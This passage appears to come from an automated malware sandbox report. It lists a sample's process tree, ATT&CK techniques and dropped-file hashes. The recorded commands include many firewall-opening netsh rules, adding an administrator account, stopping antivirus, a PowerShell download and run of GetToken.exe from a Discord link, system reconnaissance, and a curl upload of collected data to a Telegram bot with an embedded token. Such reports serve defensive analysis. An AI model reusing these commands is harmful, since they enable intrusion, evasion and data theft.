    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:5052
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1212
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1416
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4456
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3100
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:3976
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1988
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4788
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3560
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4360
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4048
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1760
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1264
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4656
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1880
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4888
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:5084
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4472
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:2712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    PID:2136
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:3528
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:5016
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3556
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4252
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1868
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1048
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:3708
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:216
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2400
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:2908
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3108
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:2908
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2404
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3844
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3644
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1708
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1728
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4116
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4600
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:2356
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2908
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4244
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4824
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3888
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4696
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1356
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1296
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2496
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:816
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4244
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:656
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:2056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1956
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4516
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4256
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4892
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:2908
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1532
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1992
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:5052
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4308
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1768
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2040
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1384
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:5040
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4472
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1940
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:3100
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3884
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1264
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1940
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1868
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3692
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4272
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3644
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4244
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:1768
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:116
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3644
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"
  2⤵
  PID:4552
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"
  2⤵
  PID:3104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"
  2⤵
  PID:3708
- C:\Users\Admin\GetToken.exe
  GetToken.exe
  2⤵
  PID:4244
- C:\Windows\system32\curl.exe
  curl -s -o IP.txt https://ipv4.wtfismyip.com/text
  2⤵
  PID:2376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt"
  2⤵
  PID:3604
- C:\Windows\system32\ipconfig.exe
  ipconfig
  2⤵
  - Gathers network information
  PID:1296
- C:\Windows\system32\getmac.exe
  getmac
  2⤵
  PID:4996
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status
  2⤵
  PID:5044
- C:\Windows\System32\Wbem\WMIC.exe
  wmic computersystem get totalphysicalmemory
  2⤵
  PID:2496
- C:\Windows\System32\Wbem\WMIC.exe
  wmic partition get name,size,type
  2⤵
  PID:1708
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:5068
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path softwarelicensingservice get OA3xOriginalProductKey
  2⤵
  PID:3264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Get-ComputerInfo"
  2⤵
  PID:1900
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  PID:1412
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\userdata.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:748
- C:\Windows\system32\curl.exe
  curl -v -F document=@C:\Users\Admin\apps.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
  2⤵
  PID:2136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
1⤵
PID:3952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
1⤵
PID:3140

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:2664

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d136d3411d4aa688242c53cafb993aa6

SHA1
1a81cc78e3ca445d5a5193e49ddce26d5e25179f

SHA256
00ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397

SHA512
282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
276cdaa5f0813dc49cf449da388f396d

SHA1
4a637f3c48855b97c6a986fd105b1bb78532c3fd

SHA256
86876c9be93432626cce48984cdaeca734bc265d199dbc60aea71f297fd0048d

SHA512
b26a37597f81e9c2a367d65832c8e1b02672f474dd36e0a9a78fe4335eafdaf5a0f274c4a9c3377e309d7e6f4e02739055c99fc26f687befe7f8a6662c2789d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
bbcdd37529a73be8f7719fdf25f048b9

SHA1
a93a6e28324488d59d13bbbe30815dd8ebcf7b8c

SHA256
e41ac259e8bda3eb609580948c52d5460aa32f1aaac49493b62bf311e4057cea

SHA512
00b772e84473633c68b3b9dad85267f22c1bcaa8b4698e2316d669e3e0c0b329c7e6d48833c8c438c347231bc556aa84456ad2a8f2d8161590580f39fb9a4284

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
15ab3b5ea67437cf06d01ddd3880a38c

SHA1
ee2efe705e05621ac8870b3f960583b0f6a40e7d

SHA256
b6d19dd422cfae6c4f1154567b4268f0b6b48b0af20b7fb276051ce0c00447ed

SHA512
7199be73dd893668fd4fda0d7ee5c4e053aef97663916d5967a5f712edad5041f0bdbe7a741b15403bcf46d0d23d1b0ac62efd53f333d3efe86661165b83dd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
15ab3b5ea67437cf06d01ddd3880a38c

SHA1
ee2efe705e05621ac8870b3f960583b0f6a40e7d

SHA256
b6d19dd422cfae6c4f1154567b4268f0b6b48b0af20b7fb276051ce0c00447ed

SHA512
7199be73dd893668fd4fda0d7ee5c4e053aef97663916d5967a5f712edad5041f0bdbe7a741b15403bcf46d0d23d1b0ac62efd53f333d3efe86661165b83dd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7bd6ba59d434275a079d271c8658ebad

SHA1
eadd2d8cd4e04fd4044988b8fe80607e87165a0a

SHA256
bb998b7f6d3f669ddbcb601d253afd2a2e84a6185e987ec56911c70f5ae44f9b

SHA512
71b00eb25d500f4ffece411d14533d1b72ed4921c8080294f61c076966f781cafc74ea40f0ac1cf5cabab8fdc9a0012c8d8da65f0cd76bce1335e33e2aaf6e2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
cce72b419e6c222a1ec864169353a618

SHA1
40d8473e3f30b380c3b2fdd3dd584e1d6b32cb39

SHA256
42db8ef0f0436cf9585086ab72c6e01d2a6d5d3366730cd3aea104e61d6290a8

SHA512
440b334e79ad51ed6a6305baa3d104c825135911e6d5cd2a557484d281d6bd48efb7af08545ade71dcf7ad66c3219892b599dc9eec1ad50d0e5a67c78421f5f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
24c13d5530c176b565619683e21ea2e7

SHA1
d65f5d8481f8b2f53ee1295f8fb06c9170914171

SHA256
7282f4459a68e55266453fc018a89377d3420baa44977f528b66eee029df84d6

SHA512
12e079e0fbab640904e9dbf746785a7824656186c26930ece5d9fb1894935feb691705145e3b3d2480a84bab2a6b99a14c735d146a747074015477c5091ffb41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc95974beb7dc59534ff37da82d4a882

SHA1
c30699355347da728ed12d30729071ca90d302b4

SHA256
72bbc1049b6bec6accde68985189c0dac0ce5b2de607ade36eaa7d7da974e902

SHA512
a65c8a90ecf83dfe94ce158b0afdb03e1a926d0bf10fe5f79417e9462b343ea84c8f83bc266b40f83ba592181a24589f01a835a3bc836af145b9c4c4d49b4ab8

Download Submit
C:\Users\Admin\AppData\Local\Temp\HideyHidey.vbs

Filesize
130B

MD5
591cc6cb1292cf00d1f24e0832e82c7f

SHA1
27b190559fd22ee46085db02ce8725a4c6720e64

SHA256
6cff6ccccc854997bb89a46157554a0265afc1f3d3f5d0522f6a1323cc559862

SHA512
0b89a67ca2c3ca0563231b805b6db921a3515f20c86dfb4cd28b195ea0de6f05f46e1fccc9041b8f96013e15d139e104454d064fd4529fb44151ee024f8d18b7

Download Submit
C:\Users\Admin\Desktop\YcynNote.txt

Filesize
443B

MD5
fb6437ee6e5d60383986fcdceaf6aa01

SHA1
cab261ec161cf328b23a8ca493058ed73c7b5f9a

SHA256
cd4d8573df1d6cfb9cffab585b8e122a1f1c4b8b7a7ae452f8be20bdcd826978

SHA512
1e8cc9e07f65d7fdc2c3c6f8369ce2fd14afe1fc1ead75f10ae1b70e65c0125f762c215ab748a8f64f86ec4e16b246f4ddfcf5581d9ebbb14635efc0300fc0c9

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe

Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe

Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\black.bat

Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
C:\Users\Admin\Downloads\2b2crypt.cmd

Filesize
133B

MD5
e35b657140b6166b5e263c0aeb237a1e

SHA1
61ebd182c373117c8d9240985b2b331c612c2103

SHA256
31a5335d238a90d8111241fc0ccda96e1035d5325333cb6320b9f0d72158b591

SHA512
0a7a3a5c9217165562e40df3e0342a200fd31b3bc5b1dca998907a782a9acf51faaf794b2c5036bfd2110f671cfd6f39c314e7473bbf640646e39b18ce30bd47

Download Submit
C:\Users\Admin\Downloads\2b2crypt.m.cmd

Filesize
139B

MD5
6187a1b930135b0ac83ddd7d9eadc4d8

SHA1
2982f7451703dc98f021cbda36c4c6bb9bca7c5c

SHA256
f594b4b662270030c7dccf3050bfd6f5b14403a3d34bd9b6c32882473c83f897

SHA512
